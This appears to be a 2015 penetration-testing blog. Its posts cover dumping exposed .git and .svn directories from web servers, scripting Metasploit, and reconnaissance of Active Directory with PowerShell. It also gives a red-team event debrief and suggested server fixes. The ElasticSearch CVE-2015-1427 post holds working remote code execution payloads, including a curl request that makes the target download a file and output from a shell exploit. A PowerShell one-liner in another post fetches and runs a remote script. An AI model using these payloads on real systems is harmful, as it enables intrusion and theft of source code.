Monday, March 23, 2015

DevOoops: Revision Control (git)


Exposed git resources is probably the most gruesome low2pwned issues out there right now.

Leaving this exposed allows an attacker to potentially download the full source of the site along with any other files that are in the git repository.

Ron's blog post on skullsecurity (see Resources) was my first exposure to the subject. I actually blogged about it back in 2012: http://carnal0wnage.attackresearch.com/2012/10/git-you-some-with-dvcs-pillage.html

There are basically two attack paths; if directory listings are on and if they are off.

I've actually talked about the fun things you can find when directory listings are on here:
http://carnal0wnage.attackresearch.com/2012/05/from-low-to-pwned-4-browsable.html

sidenote--> yikes that was almost 3 years ago

If directory listings are on you can simply wget the .git subdirectories, issue a git command and recreate the entire site.

$ mkdir git-test 
$ cd git-test 
$ wget --mirror --include-directories=/.git http://www. example.com/.git 

Then
$ cd www.example.com 
$ git reset --hard HEAD is now at [...] 

You now have the source of the site.

In case you were wondering how common this is:



If directory indexing is not enabled, you can still check for the presence of the .git folder and you'll have to essentially brute force what you need using git fsck.  DVCS-Pillage and DVCSRipper do this for you.

I do this by looking for files like .git/config.

Decent admins will give you 404 or 403 for .git/ but will return the contents of .git/config.

You can then run DVCS-Pillage/dvcs-ripper to pull down the files.

One thing that will sometimes happen is that you can download parts of the git repo but the tools mentioned above will fail to get the whole thing.  you can just 

git cat-file -p sha1hash

To see the contents of that particular piece.  An example from:




Even if its failing to grab everything you might catch a break if are getting "some" of the site.


Resources
https://blog.skullsecurity.org/2012/using-git-clone-to-get-pwn3d
https://blog.netspi.com/dumping-git-data-from-misconfigured-web-servers/
https://github.com/evilpacket/DVCS-Pillage
https://github.com/kost/dvcs-ripper



Fixes (quick Google searches, didnt test)

Apache


or

RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /


nginx

location ~ /.git/ {
  deny all;
}

.htaccess
Put in root of the webserver

RedirectMatch 404 (?i)\.git

IIS
Couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis

also http://www.petefreitag.com/item/823.cfm (Great site BTW)


CG

Monday, March 16, 2015

Metasploit and MSGRPC


I wanted to automate connecting to MSGRPC. I did find a few older tutorials on the subject:

http://blog.spiderlabs.com/2012/01/scripting-metasploit-using-msgrpc-.html
http://jumpespjump.blogspot.com/2013/05/metasploit-msgrpc-with-python-on-kali.html
https://www.fishnetsecurity.com/6labs/blog/scripting-metasploit-python
https://khr0x40sh.wordpress.com/2012/05/
http://www.jeffbryner.com/blog/itsec/pythonmetasploitmsgpack.html

You're best bet is still the spiderlabs post. However the piece of code using this:

cmd = """use auxiliary/scanner/snmp/snmp_login set RHOSTS %s run  """ % host_list

Doesnt seem to work anymore. It took me awhile to find a solution. I eventually found a post on the rapid7 community page from hdm saying to try to set it up line by line, which is what I ended up doing.

Other stuff you'll need

https://github.com/SpiderLabs/msfrpc  --simple wrapper for the calls
https://community.rapid7.com/docs/DOC-1516  -- API docs

Anyway the below is just a simple python script to read in a text file of hosts, create a database to hold the results, set up and run an auxiliary module


Here is a gist with the file:
 https://gist.github.com/carnal0wnage/5f5f64432738fc25c538#file-msgrpc_ssh_version-py

and if you just want to read it here (picture)

Gist of python code

In action

Hope it helps

-CG
CG

Wednesday, March 11, 2015

ElasticSearch CVE-2015-1427 RCE Exploit



References:
https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048

Since the exploit is  already out here [XiphosResearch github] and here [in a comment :-) ] and here [Metasploit pull request]

POC's

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

curl http://localhost:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript": {"script": "java.lang.Math.class.forName(\"java.lang.Runtime\") getRuntime() exec(\"wget -O /tmp/testy http://192.168.1.1:8080/es_test.txt\")"}}}'

$ cat /tmp/testy
It worked :-)

---

python elastic_shell.py 127.0.0.1
--snip--
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
elasticsearch
elasticsearch-service-mgr.exe
elasticsearch-service-x64.exe
elasticsearch-service-x86.exe
elasticsearch.bat
elasticsearch.in.bat
elasticsearch.in.sh
plugin
plugin.bat
service.bat
~$

To fix disable groovy scripting in config/elasticsearch.yml and upgrade to 1.4.3+


script.groovy.sandbox.enabled: false
CG

Monday, March 9, 2015

PowerShell-AD-Recon by PyroTek3


Found a couple of fun PowerShell enumeration scripts here:

https://github.com/PyroTek3/PowerShell-AD-Recon



C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"

Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET

Domain           : UNLUCKY.NET
ServerName       : unlucklaptop.unlucky.net
Port             :
Instance         : SQLEXPRESS
ServiceAccountDN :
OperatingSystem  : {Windows 8.1 Enterprise}
OSServicePack    :
LastBootup       : 1/10/2015 11:47:55 AM
OSVersion        : {6.3 (9600)}
Description      :


Domain           : UNLUCKY.NET
ServerName       : unluckserver.unlucky.net
Port               : 1433
Instance           :
ServiceAccountDN   : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem    :
OSServicePack      :
LastBootup         : 12/31/1600 4:00:00 PM
OSVersion          :
Description        :
SrvAcctUserID      : svc-userid
SrvAcctDescription : ---SNIP--- 


The rest of the repo has fun stuff too

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Find Exchange Servers

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Get a list of all the service accounts. Those are always good candidates for company defaults

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest Info

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-searches for a list of attributes across the forest. This will take a LONG time on a big domain/forest.

default list of stuff:
        [String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP","ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV","Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),


CG

Sunday, March 8, 2015

ISTS12 Thoughts, Notes, Feedback, Braindump -- Airport Edition


--Airport Edition--

Was asked to play on the Red Team for ISTS 12 at Rochester Institute of Technology.

The ISTS even runs similarly to the CCDC events, except they all teams to attack each other for points.

Anyway here are some musing on the weekend in various categories

-Things to tell the teams
-Metasploit vs Canvas
-Thoughts on the game and suggestions


Things to tell the teams:

Mubix has a great deck he updates every year on how to win at CCDC, most of it applies to ISTS.  I mentioned to the team that they should review it for next year

http://www.room362.com/blog/2012/03/19/how-to-win-ccdc-slides/

Things I'd add

  • On *nix and OS X try to learn osquery before the event.  This is a pretty quick and easy was to get some host instrumentation  on *nix/OS X
  • Sysinternals tools for windows
  • Do OSINT on your red team (ideally before the event), check their blogs, see how they *publicly* persist learn to look for that stuff during the event.  Example: Raf from Strategic Cyber (Cobalt Strike) was there, using beacon. Read his docs on how beacon works or how he does other persistence and go look for it.
  • Have team roles 
  • Decide if you want to win, attack, defend, etc.  A bunch of points came during the ISTS event came from doing challenges.  In fact it looked like most teams abandoned securing hosts and worked on challenges as there we more points to be made doing that than keep services up.
  • pwnwiki 
  • make your own personal wiki to keep up with how you hack stuff

Life Stuff

  • Have fun--If something isn't making you happy and you have the option NOT to do it. Then don't. You have the rest of your life to work. Ian mentioned this in his keynote.
  • Manage your social media presence.  If you want to post drunk pictures then create your _sec twitter handle and keep that one professional.  Its hard to get rid of trolls once you have them and employers are going to check you out online.
  • Blog.  Blogs are for you and your notes.  They have the added benefit of (hopefully) being useful for others or serving as a time capsule for your evolution in your career.
  • Learn devops tools. Chef, vagrant, docker, packeransible, fabric, AWS, nonsql databases (memcache, mondo, redis), Elasticsearch.  There are all super powerful tools and they almost all create security vulnerabilities too.
  • Learn to program.  Ruby or Python && bash for scripting.  C++/C# for hardore shiz.
  • Its easier to go from red to blue than blue to red, but easier to go from IR to red.
  • Stay at company until you and the company no longer get value from each other unless there is a monetary reason to stay a bit longer (vesting).
  • Make friends with people you can meet in person too.
  • Invest your money from the beginning, by they time you realize you haven't been saving enough you are going be old(ish) and have to devote much more cash to plus up the 401k/IRA than you would have needed to if you just started saving that 10% in your 20's.
  • Have fun.

Metasploit vs Canvas
--mostly because someone asked on twitter--
CCDC events give me the ability to try things and get caught which is something i didn't always get to do as a consultant. During these events i get to post cool pictures of me popping shells with Metasploit and Canvas.  I used to have a copy of Core Impact and was able to use that too...sadly no more.

I'm primarily a Metasploit guy but its nice to have an alternate source of exploit. For example at ISTS there were hosts vuln to DCOM but the metasploit module didn't work. The Canvas version did. Other examples Canvas ships with a Windows rootkit (HCN) and has more linux local exploits. Metasploit has mimikatz and token stealing built in.

Thoughts on the game and suggestions

First, I had lots of fun so thanks to Bryan and Jared for inviting me.

Game runs with 3 objectives.  Defend. Attack other teams, Solve Challenges.

The organizers have added the attack portion to differentiate themselves from CCDC events. The problem i see is that it's 5 person teams and thats just not enough people to do all 3 objectives.

Stuff i didn't like

  • It is not clear what services are required to run on each host for scoring--this is actually a gripe with MACCDC as well.
  • No scoring for Red Team or no scoring hit for system compromises
  • The objectives didn't seem equally weighted, teams abandoned keeping services up and solved challenges as their were more points to be obtained doing challenges
Stuff I liked
  • Preowned stuff for lolz
  • Teams could barter to get access back to their stuff
  • Red Team freedom to do whatever
  • Internet access
  • Newish OS's so we could do powershell attacks
  • Oldish OS's so you could do old school stuff
  • Web app vulns
Suggestions

-I'd love to see these events use money instead of points. Service availability equals income for most companies. If the scoreboard showed it in dollar values it **may** make service availability more fun for the teams. Specially if they got bonuses for uptime and what not.

-Points for IR for the blue teams.  Identify a red team attack, write it up,  get points or $$ for the write up and signatures

-Network monitoring devices so teams can see attacks coming in --if they configure it  or maybe preconfigure it, then they can write snort alerts or yara rules to identify interesting things.

-Add devops services; its real world and people are more likely to see elastic search than freebsd when they graduate

-Focus more on one of the three objectives; don't care which just pick

-Identify critical systems that cant be down (email, web, etc) [Thanks Mubix]

-Equal weighting on objectives if you keep them all. If you earn 1000 points doing challenges but all your services are down you should also lose 1000 points [Thanks Mubix]





CG

Monday, March 2, 2015

DevOoops: Revision Control (Subversion)


Subversion 1.6 (and earlier)

Check for .entries files

Walk svn chain to retrieve source

Example:
http://somedomain.com/.svn/text-base/index.php.svn-base
http://somedomain.com/.svn/entries

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_scanner


msf auxiliary(svn_scanner) > run

[*] Using code '404' as not found.
[+] [1.2.3.52:80] SVN Entries file found.
[*] [1.2.3.52] dir CURRENT [dw394]
[*] - Trying to get file rss2html2.php source code.
[*] - Location: /.svn/text-base/rss2html2.php.svn-base
[*]


Fatal error:  Call to undefined function FeedForAll_scripts_readFile() in /usr/local/apache2-marketing/htdocs/.svn/text-base/rss2html2.php.svn-base on line 772
---SNIP---
[*] Done. 175 records.
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Unfortunately web servers will usually catch the php and try to render it for you :-(



Once you have the source you look for config files or interesting things in the source code

Example:



Subversion 1.7 and later

Working copy and changes stored in a sqlite database

Example:
http://www.somedomain.com/.svn/wc.db

Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_wcdb_scanner



From the SANS link below example to pull out files on the server

"We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion."

$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2s/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base
...


Anything with a .svn/pristine should be downloadable:

$ wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
<?php
// This is the index.php file
...

Example:





Great reference for the above:

http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us

Other blog posts on the subject:

https://blog.netspi.com/parsing-svn-entries-files-with-powershell/

Fixes (quick Google searches, didnt test)

Apache



or

RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /


nginx

location ~ /.svn/ {
  deny all;
}

.htaccess

RedirectMatch 404 (?i)\.svn

IIS
couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis

also http://www.petefreitag.com/item/823.cfm (Great site BTW)


CG